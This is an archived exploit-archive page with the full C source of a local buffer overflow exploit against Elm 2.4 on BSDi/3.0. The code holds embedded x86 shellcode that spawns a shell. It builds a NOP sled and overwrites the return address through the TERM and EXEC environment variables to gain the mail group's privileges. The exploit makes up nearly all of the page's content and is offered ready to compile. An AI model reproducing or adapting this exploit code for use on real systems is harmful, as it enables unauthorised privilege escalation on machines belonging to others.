exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

bsdi_elm.c

bsdi_elm.c
Posted Nov 16, 2000
Authored by vade79, realhalo | Site realhalo.org

BSDI Elm 2.4 local buffer overflow exploit. Tested on BSDI/3.0, gives a group mail shell.

tags | exploit, overflow, shell, local
SHA-256 | 6a330ce2fc59bf584d239c77e5b345d9e7bb1abdf51acce4a1c2b43634c09ae2

bsdi_elm.c

Change Mirror Download
/* (BSDi)elm[v2.4] buffer overflow, by v9[v9@fakehalo.org].  this exploit
yields egid/group=14(mail) on BSDi/3.0 systems with the elm package.
*/
#define PATH "/usr/contrib/bin/elm" /* path to elm on BSDi/3.0. */
#define DEFAULT_OFFSET -3000 /* general offset, a lot of room. */
static char exec[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */
"\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */
"\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */
"\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */
long pointer(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char eip[64],buf[4096];
int i,offset;
long ret;
printf("[ (BSDi)elm[v2.4]: buffer overflow, by: v9[v9@fakehalo.org]. ]\n");
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(pointer()-offset);
for(i=1;i<64;i+=4){*(long *)&eip[i]=ret;}
eip[64]=0x0;
for(i=0;i<(4096-strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
memcpy(buf+i,exec,strlen(exec));
memcpy(buf,"EXEC=",5);putenv(buf);
memcpy(eip,"TERM=",5);putenv(eip);
printf("*** [data]: return address: 0x%lx, offset: %d.\n",ret,offset);
if(execlp(PATH,"elm",0)){
printf("*** [error]: could not execute %s successfully.\n",PATH);
exit(1);
}
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close